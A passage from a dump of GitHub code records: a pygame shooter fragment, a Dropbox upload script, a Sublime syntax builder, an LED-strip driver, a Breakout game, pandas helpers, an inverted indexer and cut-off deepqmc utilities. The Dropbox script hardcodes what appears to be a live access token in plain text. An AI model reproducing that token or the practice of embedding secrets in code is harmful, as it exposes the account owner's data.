menu:\n inicioJuego()\n menu = False\n # Mantener el loop corriendo a la velocidad requerida\n clock.tick(FPS)\n # Eventos - Procesos\n for event in pygame.event.get():\n # Revisar si se cerró la ventana del juego\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n player.shoot()\n\n # Actualizar\n allSprites.update()\n\n # Revisa si una bala se impacta con algún enemigo(mob)\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n for hit in hits:\n score += 100 - hit.radius\n random.choice(explotionSounds).play()\n explosion = Explosion(hit.rect.center, 'lg')\n allSprites.add(explosion)\n nuevoMeteorito()\n\n # Revisa si algún enemigo(mob) choca con el Sprite Player\n hits = pygame.sprite.spritecollide(player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= hit.radius\n random.choice(explotionSounds).play()\n explosion = Explosion(hit.rect.center, 'sm')\n allSprites.add(explosion)\n nuevoMeteorito()\n if player.shield <= 0:\n naveDestruidaSound.play()\n naveDestruida = Explosion(player.rect.center, 'lg')\n allSprites.add(naveDestruida)\n player.ocultar()\n player.vidas -= 1\n player.shield = 100\n\n # Si se destruye la nave y la explosión termino\n if player.vidas == 0 and not naveDestruida.alive():\n gameOver(score)\n\n # Renedr / Draw\n ventana.fill(BLACK)\n ventana.blit(bg, bgRect)\n allSprites.draw(ventana)\n dibujarBarraEscudo(ventana, 30, 10, player.shield)\n typeText(ventana, str(player.shield), 14, 150, 8)\n typeText(ventana, str(score), 18, WIDTH / 2, 10)\n mostrarVidas(ventana, WIDTH - 120, 10, player.vidas, naveVidaImg)\n # After drawing flip the new slide\n pygame.display.flip()\n pygame.quit()\n\n\ndef main():\n preguntarNombre()\n dibujar(score)\n\n\nmain()\n","repo_name":"CarlosMtz98/ProyectoFinal","sub_path":"Space.py","file_name":"Space.py","file_ext":"py","file_size_in_byte":13212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27394610398","text":"import dropbox\r\n\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n\r\n def upload_file(self, file_from, file_to):\r\n \"\"\"upload a file to Dropbox using API v2\r\n \"\"\"\r\n dbx = dropbox.Dropbox(self.access_token)\r\n\r\n with open(file_from, 'rb') as f:\r\n dbx.files_upload(f.read(), file_to)\r\n\r\ndef main():\r\n access_token = 'sl.A2yrr7U2bH6CmEHP072nInY-MqBSWneYi-Iv6hlp-wyQWgbfjsglax7pZJVmlRlA5G3W6b221PlP3yHKT-dhqU0UIDqahY_UZWuakOX9_0oCUF-erwiWVmN_20GEHgdFEvX2Qvw'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = '/Users/HP_BOOK_PRO/Desktop/c-101/test.txt'\r\n file_to = '/Users/HP_BOOK_PRO/Dropbox/test.txt' # The full path to upload the file to, including the file name\r\n\r\n # API v2\r\n transferData.upload_file(file_from, file_to)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"akku3012/c101","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29954287875","text":"from os.path import join\n\n# Module level constants\nCURRENT_DIR = '.'\nLANG_PATH = join(CURRENT_DIR, 'lang')\n\n# Import cutils modules\ntry:\n import cutils.ccom\n import cutils.clic\n import cutils.cver\n\n # Update version\n cutils.cver.version(CURRENT_DIR, sub_max=9, rev_max=99, build_max=999)\n # Collect all special comments\n cutils.ccom.collect(CURRENT_DIR)\n # Update header comments\n cutils.clic.header(CURRENT_DIR)\nexcept ImportError:\n print('[WARNING] cutils modules are missing: '\n 'install it from http://www.cutils.org')\n\n# Import tmtools modules\ntry:\n from tmtools.convert import Language\nexcept ImportError:\n from sys import exit\n print('[ ERROR ] tmtools modules are missing: '\n 'install it from http://github.com/petervaro/tmtools')\n exit(-1)\n\n#------------------------------------------------------------------------------#\n# Import user modules\nfrom src.rust import syntax\n\n# I/O Details of languages and themes\ndetails = {'name' : 'Rusty',\n 'path' : LANG_PATH,\n 'scope': 'rs',\n 'comments' : {'lines': '//',\n 'blocks': ('/*', '*/')},\n 'buildsys' : {'build': 'cargo build',\n 'run': 'cargo run',\n 'rebuild': 'cargo clean && cargo build',\n 'rebuild_and_run': 'cargo clean && cargo run'},\n 'test_name': 'Rusty_TEST',\n 'test_path': '~/Library/Application Support/Sublime Text 3/'\n 'Packages/User/Rusty_TEST'}\n\n# NOTE: Old path to theme files => DO NOT SUPPORT IT:\n# '~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default'\n\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #\n# Setup names and locations\nlang = Language(**details)\n# Convert and save language file\nlang.from_dict(syntax)\nlang.write()\n","repo_name":"petervaro/rust","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"17560449125","text":"'''\nAuthor: Georden Grabuskie ggrabuskie@csu.fullerton.edu\nDriving ws2812 LED light strip from an SPI bus.\n\nThis code operates by syncing sent data to match the expected input\ntiming of the ws2812 LED light strips.\nUses the FT232H breakout board to add SPI capability using an open\nUSB port.\n\nAll base code taken directly from \nhttps://learn.adafruit.com/adafruit-ft232h-breakout/spi\n'''\n\nfrom time import sleep\nimport Adafruit_GPIO as GPIO\nimport Adafruit_GPIO.FT232H as FT232H\n#tuples to be used as operands\nOFF = (0, 0, 0) #light OFF\nRED = (255, 0, 0) #AUX POWER\nORANGE = (255, 75, 0) #MOBILITY + ARM/SCIENCE MODULE MODE\nYELLOW = (240, 255, 0) #MOBILITY ONLY MODE\nGREEN = (0, 255, 0) #ALL_ON\nBLUE_GREEN = (10, 255, 255) # Ebyte 433 MHZ COMM MODE\nBLUE = (0, 0, 255) #Ubiquiti 3.4 GHZ COMM MODE\nPURPLE = (255, 0, 127) #Attached MODULE MODE\nWHITE = (255, 255, 255) #chase light\n\n# mode 0 = both, mode 1 = mobility, mode 2 = arm, mode 3 = arm Single(Not Mixed)\nAUX_COLOR = RED #auxillary power\nALL_COLOR = GREEN #auxillary and main power\nMOBILITY_COLOR = YELLOW #mobility only\nMODULE_COLOR = PURPLE #arm/science only\nFULL_CONTROL = ORANGE #both mobility and arm/science\nGHZ_COLOR = BLUE #ubiquity\nMHZ_COLOR = BLUE_GREEN #433 MHz backup radio\n\nmode = 1 #value will be pulled from subscribed topic \n\nclass Rover_Status_Lights(object):\n\n\tdef __init__(self, n):\n\t\t# Create an FT232H object.\n\t\tself.ft232h = FT232H.FT232H()\n\t\t# Create a SPI interface for the FT232H object. Set the SPI bus to 6mhz.\n\t\tself.spi = FT232H.SPI(self.ft232h, max_speed_hz=12800000)\n\t\t# Create a pixel data buffer and lookup table.\n\t\tself.buffer = bytearray(n*24)\n\t\tself.lookup = self.build_byte_lookup()\n\n\n\n\n\n\n\tdef build_byte_lookup(self):\n\t\t# Create a lookup table to map all byte values to 8 byte values which\n\t\t# represent the 6mhz SPI data to generate the NeoPixel signal for the\n\t\t# specified byte.\n\t\tlookup = {}\n\t\tfor i in range(256):\n\t\t\tvalue = bytearray()\n\t\t\tfor j in range(7, -1, -1):\n\t\t\t\tif ((i >> j) & 1) == 0:\n\t\t\t\t\tvalue.append(0b11100000)\n\t\t\t\telse:\n\t\t\t\t\tvalue.append(0b11111000)\n\t\t\tlookup[i] = value\n\t\treturn lookup\n\n\tdef setColor(self, n, r, g, b):\n\t\t# Set the pixel RGB color for the pixel at position n.\n\t\t# Assumes GRB NeoPixel color ordering, but it's easy to change below.\n\t\tindex = n*24\n\t\tself.buffer[index :index+8 ] = self.lookup[int(g)]\n\t\tself.buffer[index+8 :index+16] = self.lookup[int(r)]\n\t\tself.buffer[index+16:index+24] = self.lookup[int(b)]\n\n\tdef show(self):\n\t\t# Send the pixel buffer out the SPI data output pin (D1) as a NeoPixel\n\t\t# signal.\n\t\tself.spi.write(self.buffer)\n\n\tdef set_front(self, r, g, b):\n\t\tprint(r + g + b)\n\t\tfor i in range(0, 7):\n\t\t\tself.setColor(i, r, g, b) #front right\n\t\tfor i in range(53, 60):\n\t\t\tself.setColor(i, r, g, b) #front left\n\t\tself.show()\n\n\tdef set_front_chase(self, r, g, b):\n\t\tchaseL = 53 #start status for the front left lights\n\t\tchaseR = 7 #end status for the front right lights (order is reversed between sides)\n\t\twhile True:\t\t#cycle throught the front lights from rear to front changing between blue and orange\n\t\t\tfor i in range(7):\n\t\t\t\tself.setColor(chaseL + i, *WHITE) \n\t\t\t\tself.setColor(chaseR - i, *WHITE)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.05)\n\t\t\t\tself.setColor(chaseL + i, r, g, b) \n\t\t\t\tself.setColor(chaseR - i, r, g, b)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.02)\n\t\t\tsleep(.5)\n\n\tdef set_mid(self, r, g, b):\n\t\tfor i in range(7, 15):\n\t\t\tself.setColor(i, r, g, b) #middle front right\n\t\tfor i in range(45, 53):\n\t\t\tself.setColor(i, r, g, b) #middle front left\n\t\tself.show()\n\n\tdef set_rear(self, r, g, b):\n\t\tfor i in range(15, 30):\n\t\t\tself.setColor(i, *BLUE) #rear right\n\t\tfor i in range(30, 45):\n\t\t\tself.setColor(i, *ORANGE) #rear left\n\t\tself.show()\n\t\n\tdef set_all(self, r, g, b):\n\t\tfor i in range(0, 60):\n\t\t\tself.setColor(i, *OFF)\n\t\tself.show()\n\n\n\tdef idle(self):\n\t\tfor i in range (60):\n\t\t\tself.setColor(i, *WHITE)\n\t\tself.show()\n\t\tsleep(0.25)\n\n\t\twhile True:\t\t#cycle throught the front lights from rear to front changing between blue and orange\n\t\t\tchaseL = 30 #start status for the front left lights\n\t\t\tchaseR = 30 #end status for the front right lights (order is reversed between sides)\n\t\t\tfor i in range(31):\n\t\t\t\tself.setColor(chaseL + i, *BLUE) \n\t\t\t\tself.setColor(chaseR - i, *BLUE)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.03)\n\n\t\t\tsleep(.5)\n\t\t\tfor i in range(31): \t\t#repeat to swap colors back\n\t\t\t\tself.setColor(chaseL + i, *ORANGE) \n\t\t\t\tself.setColor(chaseR - i , *ORANGE)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.03)\n\n\t\t\tsleep(.5)\n\n\tdef test(self):\n\t\tprint(\"Test\")\n\t\t#All directions given from behind the rover.\n\t\tfor i in range(0, 59):\n\t\t\tself.setColor(i, *OFF) #refresh all\n\t\t\tself.show()\n\t\tsleep(0.25)\n\t\tfor i in range(0, 7):\n\t\t\tself.setColor(i, *RED) #front right\n\t\tfor i in range(7, 15):\n\t\t\tself.setColor(i, *ORANGE) #middle front right\n\t\tfor i in range(15, 23):\n\t\t\tself.setColor(i, *YELLOW) #middle rear right\n\t\tfor i in range(23, 30):\n\t\t\tself.setColor(i, *GREEN) #rear right sides\n\t\t\t\n\t\tfor i in range(30, 37):\n\t\t\tself.setColor(i, *BLUE_GREEN) #rear left\n\t\tfor i in range(37, 45):\n\t\t\tself.setColor(i, *BLUE) #middle rear left\n\t\tfor i in range(45, 53):\n\t\t\tself.setColor(i, *PURPLE) #middle front left\n\t\tfor i in range(53, 60):\n\t\t\tself.setColor(i, *WHITE) #front left\n\t\tself.show()\n\n\tdef update(self, mode):\n\n\t\tself.dispatch = {\n\t\t\t\t\t0 : (self.set_front_chase, FULL_CONTROL),\n\t\t\t\t\t1 : (self.set_front_chase, MOBILITY_COLOR),\n\t\t\t\t\t2 : (self.set_front_chase, MODULE_COLOR),\n\t\t\t\t\t\"aux\" : (self.set_mid, AUX_COLOR),\n\t\t\t\t\t\"all\" : (self.set_mid, ALL_COLOR),\n\t\t\t\t\t\"ghz\" : (self.set_rear, GHZ_COLOR),\n\t\t\t\t\t\"mhz\" : (self.set_rear, MHZ_COLOR)\n\t\t\t\t\t}\n\n\t\tself.dispatch[mode][0](*self.dispatch[mode][1])\n\n\n\n\n# Run this code when the script is called at the command line:\nif __name__ == '__main__':\n\t# Define the number of self in the NeoPixel strip.\n\t# Only up to ~340 self can be written using the FT232H.\n\tpixel_count = 60\n\t# Create a NeoPixel_FT232H object.\n\tstatus = Rover_Status_Lights(pixel_count)\n\tstatus.set_all(*OFF)\n\tstatus.update(mode)\n\t#status.set_front_chase(*RED)\n\n","repo_name":"ggrabuskie/leddy","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2751555373","text":"\"\"\"\nstanCode Breakout Project\nAdapted from Eric Roberts's Breakout by\nSonja Johnson-Yu, Kylie Jue, Nick Bowman, \nand Jerry Liao\n\nYOUR DESCRIPTION HERE\n\"\"\"\nfrom campy.graphics.gwindow import GWindow\nfrom campy.graphics.gobjects import GOval, GRect\nfrom campy.gui.events.mouse import onmouseclicked, onmousemoved\nimport random\n\nBRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.\nBRICK_WIDTH = 40 # Height of a brick (in pixels).\nBRICK_HEIGHT = 15 # Height of a brick (in pixels).\nBRICK_ROWS = 10 # Number of rows of bricks.\nBRICK_COLS = 10 # Number of columns of bricks.\nBRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).\nBALL_RADIUS = 10 # Radius of the ball (in pixels).\nPADDLE_WIDTH = 75 # Width of the paddle (in pixels).\nPADDLE_HEIGHT = 15 # Height of the paddle (in pixels).\nPADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).\n\nINITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.\nMAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.\n\n\nclass BreakoutGraphics:\n def __init__(self, ball_radius=BALL_RADIUS, paddle_width=PADDLE_WIDTH,\n paddle_height=PADDLE_HEIGHT, paddle_offset=PADDLE_OFFSET,\n brick_rows=BRICK_ROWS, brick_cols=BRICK_COLS,\n brick_width=BRICK_WIDTH, brick_height=BRICK_HEIGHT,\n brick_offset=BRICK_OFFSET, brick_spacing=BRICK_SPACING,\n title='Breakout', dx=MAX_X_SPEED, dy=INITIAL_Y_SPEED,):\n # Create a graphical window, with some extra space\n self.window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing\n self.window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)\n self.window = GWindow(width=self.window_width, height=self.window_height, title=title)\n # Create a paddle\n self.paddle_width = paddle_width\n self.paddle_height = paddle_height\n self.paddle_offset = paddle_offset\n self.paddle = GRect(width=self.paddle_width, height=self.paddle_height,\n x=(self.window_width-self.paddle_width)/2,\n y=self.window_height-self.paddle_offset)\n self.paddle.filled = True\n self.window.add(self.paddle)\n # Center a filled ball in the graphical window\n self.ball_radius = ball_radius\n self.ball = GOval(self.ball_radius*2, self.ball_radius*2, x=(self.window_width-self.ball_radius)/2,\n y=(self.window_height-self.ball_radius)/2)\n self.ball.filled = True\n self.window.add(self.ball)\n # Default initial velocity for the ball\n self.__dx = dx\n self.__dy = dy\n self.get_velocity_x()\n self.get_velocity_y()\n self.set_ball_velocity()\n # Draw bricks\n self.brick_rows = brick_rows\n self.brick_cols = brick_cols\n self.brick_width = brick_width\n self.brick_height = brick_height\n self.brick_offset = brick_offset\n self.brick_spacing = brick_spacing\n for row in range(self.brick_rows):\n for col in range(self.brick_cols):\n self.brick = GRect(width=self.brick_width, height=self.brick_height,\n x=(self.brick_width + self.brick_spacing) * col\n , y=self.brick_offset + (self.brick_height + self.brick_spacing) * row)\n self.brick.filled = True\n if row < 2:\n self.brick.fill_color = \"RED\"\n elif row == 2 or row == 3:\n self.brick.fill_color = \"ORANGE\"\n elif row == 4 or row == 5:\n self.brick.fill_color = \"YELLOW\"\n elif row == 6 or row == 7:\n self.brick.fill_color = \"GREEN\"\n else:\n self.brick.fill_color = \"BLUE\"\n self.window.add(self.brick)\n # Initialize our mouse listeners\n onmousemoved(self.paddle_move)\n onmouseclicked(self.handle_click)\n self.start = False\n # detect if ball hit other objects\n self.detect()\n\n def detect(self):\n obj = self.window.get_object_at(self.ball.x, self.ball.y)\n if self.window.get_object_at(self.ball.x, self.ball.y) is not None:\n return self.window.get_object_at(obj.x, obj.y)\n elif self.window.get_object_at(self.ball.x+2*self.ball_radius, self.ball.y) is not None:\n return self.window.get_object_at(self.ball.x+2*self.ball_radius, self.ball.y)\n elif self.window.get_object_at(self.ball.x, self.ball.y + 2 * self.ball_radius) is not None:\n return self.window.get_object_at(self.ball.x, self.ball.y + 2 * self.ball_radius)\n elif self.window.get_object_at(self.ball.x + 2 * self.ball_radius,\n self.ball.y + 2 * self.ball_radius) is not None:\n return self.window.get_object_at(self.ball.x + 2 * self.ball_radius,\n self.ball.y + 2 * self.ball_radius)\n else:\n return None\n\n def get_velocity_x(self):\n return self.__dx\n\n def get_velocity_y(self):\n return self.__dy\n\n def set_ball_velocity(self):\n self.__dx = random.randint(0, MAX_X_SPEED)\n if random.random() > 0.5:\n self.__dx = -self.__dx\n return self.__dx\n\n def paddle_move(self, m):\n if 0 - self.paddle_width <= m.x < self.window_width - self.paddle_width:\n self.window.add(self.paddle, x=(m.x + self.paddle_width) / 2,\n y=self.window_height - self.paddle_offset)\n elif m.x > self.window_width - self.paddle_width:\n self.window.add(self.paddle, x=self.window_width - self.paddle_width,\n y=self.window_height - self.paddle_offset)\n\n def handle_click(self, event):\n if not self.start:\n self.start = True\n","repo_name":"ozzyfly/StanCode_assignment","sub_path":"未命名檔案夾/breakoutgraphics.py","file_name":"breakoutgraphics.py","file_ext":"py","file_size_in_byte":6108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18621718680","text":"import os\n\nimport pandas as pd\n\n\ndef convert(working_dir, filename, output_filename, sheet_name=0, rename='Unit ID'):\n read_file = pd.read_excel(os.path.join(working_dir, filename), sheet_name=sheet_name)\n read_file = read_file.rename(columns={rename: 'unit_id'})\n read_file.to_csv(os.path.join(working_dir, output_filename), index=None, header=True)\n\n\ndef convert_delete(working_dir, filename, output_filename, sheet_name=0):\n convert(working_dir, filename, output_filename, sheet_name=sheet_name)\n os.remove(os.path.join(working_dir, filename))\n\n\ndef count(file, working_dir):\n huge_filename = os.path.join(working_dir, file)\n dfs = pd.read_csv(huge_filename, chunksize=100000)\n pd.set_option('max_columns', None)\n counter = 0\n for df in dfs:\n counter += df.size\n print(\"now:\", counter)\n#\n# technology_count_df = source_df[[\"Technology\"]].value_counts().reset_index(name='num_probes')\n# print(technology_count_df)\n#\n# state_count_df = source_df[[\"State\"]].value_counts().reset_index(name='num_probes')\n# print(state_count_df)\n\n# census_count_df = source_df[[\"Census\"]].value_counts().reset_index(name='num_probes')\n# print(census_count_df)\n\n# cc = df_probes[[\"unit_id\"]].apply(to_technology, axis=1, result_type='expand')\n# def to_technology(series):\n# print(series, type(series), series['unit_id'], type(series['unit_id']))\n# search = df_unit_profile[df_unit_profile['unit_id'] == series['unit_id']]\n# print(search.size)\n# return search[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]].values[0]\n#\n#\n# # ser_to = pd.Series({\"kkk\": 27681})\n# ser_to = to_technology(pd.Series({\"unit_id\": 458}))\n# print(ser_to, type(ser_to))\n\n# df_probes[\"unit_id\"], df_probes[\"ISP\"], df_probes[\"Technology\"], df_probes[\"State\"], df_probes[\n# \"Census\"] = to_technology(df_probes[\"unit_id\"])\n# ser = df_probes.iloc[:, 0]\n# print(ser, type(ser))\n# df_probes[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]] = df_probes.iloc[:, 0].map(to_technology, axis=1)\n# print(df_probes)\n# cc = df_probes.iloc[:, 0].map(df_unit_profile.set_index('unit_id')[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]])\n# print(cc)\n# cc = df_probes[\"unit_id\"].map(dict(df_unit_profile[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]].values[0]))\n# print(cc)\n","repo_name":"sstshenshutao/internetmeasureexe2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27235741594","text":"import json\n\n# global variables\nFOLDER_NAME = 'downloaded-files/' # location to download the textual files\nfilenames = [] # stores the name of all the files created\n\n\n'''\n Given: a file name and list to store the unique crawled links\n Effect: populates the given list with the links extracted from the given file name.\n'''\ndef get_crawled_links(file_name, crawled_links):\n with open(file_name, 'r') as file: # open file\n line = file.readlines()\n crawled_links.extend([FOLDER_NAME + l.strip().split('/wiki/')[-1] + '.txt' for l in line]) # generate file names\n\n'''\n Given: a file name\n Returns: a list of all the words in the given file\n'''\ndef read_text(file_name):\n terms = [] # list of all terms\n with open(file_name, 'r') as file: # open file\n line = file.readlines()\n for l in line:\n terms += l.strip().split() # get each term\n return terms\n\n'''\n Given: a list of terms and an integer n\n Returns: a list of all the n-grams in the given list\n'''\ndef get_ngrams(terms, n):\n ngrams = [] # n-gram list\n for i in range(0, len(terms)):\n ngrams.append(' '.join(terms[i : i + n])) # generate n-grams using join\n return ngrams\n\n'''\n Given: a list of file names and an integer n\n Returns: a dictionary where keys are terms and values are dictionaries\n that contain document ID to total term count mapping\n'''\ndef tf_inverted_indexer(file_list, n):\n term_tf = {} # dict with terms as keys\n for file in file_list:\n doc_id = file.split('.txt')[0].split('/')[-1] # make doc ID\n terms = read_text(file) # all terms in the file\n ngrams = get_ngrams(terms, n) # list of n-grams in that file\n for gram in ngrams:\n if gram in term_tf: # if term has been added to dict\n if doc_id in term_tf[gram]: # if document ID has been added to value dict\n term_tf[gram][doc_id] += 1 # increase term count by 1\n else:\n term_tf[gram][doc_id] = 1 # if new document ID is seen, create key of document ID\n else:\n term_tf[gram] = {} # create value dict\n term_tf[gram][doc_id] = 1 # add key of document ID and initial term count\n return term_tf\n\n'''\n Given: a list of file names and an integer n\n Returns: a dictionary where keys are terms and values are dictionaries\n that contain document ID to list of term positions mapping\n'''\ndef tp_inverted_indexer(file_list, n):\n term_tp = {} # dict with terms as keys\n for file in file_list:\n doc_id = file.split('.txt')[0].split('/')[-1] # make doc ID\n terms = read_text(file) # all terms in the file\n ngrams = get_ngrams(terms, n) # list of n-grams in that file\n for i in range(len(ngrams)):\n pos = i + 1 # position of the term in the document\n if ngrams[i] in term_tp: # if term has been added to dict\n if doc_id in term_tp[ngrams[i]]: # if document ID has been added to value dict\n term_tp[ngrams[i]][doc_id].append(pos) # append position to position list\n else:\n term_tp[ngrams[i]][doc_id] = [pos] # if new document ID is seen, create key of document ID\n else:\n term_tp[ngrams[i]] = {} # create value dict\n term_tp[ngrams[i]][doc_id] = [pos] # add key of document ID and initial term position\n return term_tp\n\n'''\n Given: a dictionary and a file name\n Effect: writes the inverted index with term frequencies to a txt file\n in the format term -> (docID, tf)\n'''\ndef write_term_frequencies(ttf, file_name):\n with open(file_name, 'w', encoding='utf-8') as outfile:\n for t in ttf:\n outfile.write(\"%s\\t->\\t\" %t)\n for d in ttf[t]:\n outfile.write(\"(%s,\\t\" % d)\n outfile.write(\"%s)\\t\" % ttf[t][d])\n outfile.write(\"\\n\")\n\n'''\n Given: a dictionary and a filename\n Effect: writes the inverted index with term positions to a txt file\n in the format term -> (docID, pos1,pos2,...)\n'''\ndef write_term_positions(ttp, file_name):\n with open(file_name, 'w', encoding='utf-8') as outfile:\n for t in ttp:\n outfile.write(\"%s\\t->\\t\" %t)\n for d in ttp[t]:\n outfile.write(\"(%s\\t\" %d)\n for pos in range(len(ttp[t][d])):\n if pos == len(ttp[t][d]) - 1:\n outfile.write(\"%s\" %ttp[t][d][pos])\n else:\n outfile.write(\"%s,\" %ttp[t][d][pos])\n outfile.write(\")\\t\")\n outfile.write(\"\\n\")\n\n\n'''\n Given: a dictionary and a filename\n Effect: writes the inverted index into a json file\n'''\ndef write_to_json(inv_index, filename):\n writer = open(filename, 'w')\n json.dump(inv_index, writer)\n writer.close()\n\n# main method\ndef main():\n get_crawled_links(\"bfs_crawled_links.txt\", filenames)\n\n # create inverted indexes\n unigram_term_doc_tf = tf_inverted_indexer(filenames, 1)\n bigram_term_doc_tf = tf_inverted_indexer(filenames, 2)\n trigram_term_doc_tf = tf_inverted_indexer(filenames, 3)\n unigram_term_doc_tp = tp_inverted_indexer(filenames, 1)\n\n # write to text files\n write_term_frequencies(unigram_term_doc_tf, \"unigram_tf_inverted_index.txt\")\n write_term_frequencies(bigram_term_doc_tf, \"bigram_tf_inverted_index.txt\")\n write_term_frequencies(trigram_term_doc_tf, \"trigram_tf_inverted_index.txt\")\n write_term_positions(unigram_term_doc_tp, \"unigram_tp_inverted_index.txt\")\n\n # write to json files\n write_to_json(unigram_term_doc_tf, \"unigram_tf_inverted_index.json\")\n write_to_json(bigram_term_doc_tf, \"bigram_tf_inverted_index.json\")\n write_to_json(trigram_term_doc_tf, \"trigram_tf_inverted_index.json\")\n write_to_json(unigram_term_doc_tp, \"unigram_tp_inverted_index.json\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shashwatshetty/information-retrieval-systems","sub_path":"wiki-retrieval-engine/inverted-indexer/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10031854667","text":"import time\nfrom collections import UserDict, defaultdict\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import wraps\n\nimport numpy as np\nimport torch\n\nfrom .errors import DeepQMCError\n\n__all__ = ()\n\n\ndef get_flat_mesh(bounds, npts, device=None):\n edges = [torch.linspace(*b, n, device=device) for b, n in zip(bounds, npts)]\n grids = torch.meshgrid(*edges)\n return torch.stack(grids).flatten(start_dim=1).t(), edges\n\n\ndef integrate_on_mesh(func, bounds, density=0.02):\n ns_pts = [int((bs[1] - bs[0]) / density) for bs in bounds]\n vol = np.array([bs[1] - bs[0] for bs in bounds]).prod()\n mesh = get_flat_mesh(bounds, ns_pts)[0]\n return sum(func(x).sum() for x in mesh.chunk(100)) * (vol / mesh.shape[0])\n\n\n# TODO refactor as NestedDict\nclass DebugContainer(UserDict):\n def __init__(self):\n super().__init__()\n self._levels = []\n\n @contextmanager\n def cd(self, label):\n self._levels.append(label)\n try:\n yield\n finally:\n assert label == self._levels.pop()\n\n def _getkey(self, key):\n if isinstance(key, int) and not self._levels:\n return key\n return '.'.join([*self._levels, str(key)])\n\n def __getitem__(self, key):\n key = self._getkey(key)\n try:\n val = super().__getitem__(key)\n except KeyError:\n val = self.__class__()\n self.__setitem__(key, val)\n return val\n\n def __setitem__(self, key, val):\n if isinstance(val, torch.Tensor):\n val = val.detach().cpu()\n super().__setitem__(self._getkey(key), val)\n\n def result(self, val):\n super().__setitem__('.'.join(self._levels), val)\n return val\n\n\nclass _NullDebug(DebugContainer):\n def __setitem__(self, key, val):\n pass\n\n def result(self, val):\n return val\n\n\nNULL_DEBUG = _NullDebug()\n\n\ndef debugged(func, label):\n @wraps(func)\n def wrapped(*args, **kwargs):\n debug = DebugContainer()\n func(*args, **kwargs, debug=debug)\n return debug[label]\n\n return wrapped\n\n\nclass Debuggable:\n def debug(self, label):\n return debugged(self, label)\n\n\ndef batch_eval(func, batches, *args, **kwargs):\n return torch.cat([func(batch, *args, **kwargs) for batch in batches])\n\n\ndef batch_eval_tuple(func, batches, *args, **kwargs):\n results = list(zip(*(func(batch, *args, **kwargs) for batch in batches)))\n return tuple(torch.cat(result) for result in results)\n\n\n@contextmanager\ndef timer():\n now = np.array(time.time())\n try:\n yield now\n finally:\n now[...] = time.time() - now\n\n\ndef now():\n return datetime.now().isoformat(timespec='seconds')\n\n\ndef expand_1d(r, x, k, i):\n rs = r.repeat(len(x), 1, 1)\n rs[:, k, i] += x\n return rs\n\n\nclass NestedDict(dict):\n def __init__(self, dct=None):\n super().__init__()\n if dct:\n self.update(dct)\n\n def _split_key(self, key):\n key, *nested_key = key.split('.', 1)\n return (key, nested_key[0]) if nested_key else (key, None)\n\n def __getitem__(self, key):\n key, nested_key = self._split_key(key)\n try:\n val = super().__getitem__(key)\n except KeyError:\n val = NestedDict()\n super().__setitem__(key, val)\n if nested_key:\n return val[nested_key]\n return val\n\n def __setitem__(self, key, val):\n key, nested_key = self._split_key(key)\n if nested_key:\n self[key][nested_key] = val\n else:\n super().__setitem__(key, val)\n\n def __delitem__(self, key):\n key, nested_key = self._split_key(key)\n if nested_key:\n del super().__getitem__(key)[nested_key]\n else:\n super().__delitem__(key)\n\n def update(self, other):\n for key, val in other.items():\n if isinstance(val, dict):\n if not isinstance(self[key], NestedDict):\n if isinstance(self[key], dict):\n self[key] = NestedDict(self[key])\n else:\n self[key] = NestedDict()\n super().__getitem__(key).update(val)\n else:\n super().__setitem__(key, val)\n\n\ndef unused_cuda_memory():\n import subprocess\n\n mem_total = torch.cuda.get_device_properties(0).total_memory / 1e6\n out = subprocess.run(['nvidia-smi', '-q'], capture_output=True).stdout.decode()\n mem_used = sum(int(l.split()[4]) for l in out.split('\\n') if 'Used GPU Memory' in l)\n mem_used *= 1024 ** 2 / 1e6\n return mem_total - mem_used\n\n\ndef estimate_optimal_batch_size_cuda(\n test_func, test_batch_sizes, mem_margin=0.9, max_memory=None,\n):\n assert len(test_batch_sizes) >= 4\n test_batch_sizes = torch.as_tensor(test_batch_sizes).float()\n mem = []\n for size in test_batch_sizes.int():\n torch.cuda.reset_max_memory_allocated()\n test_func(size.item())\n 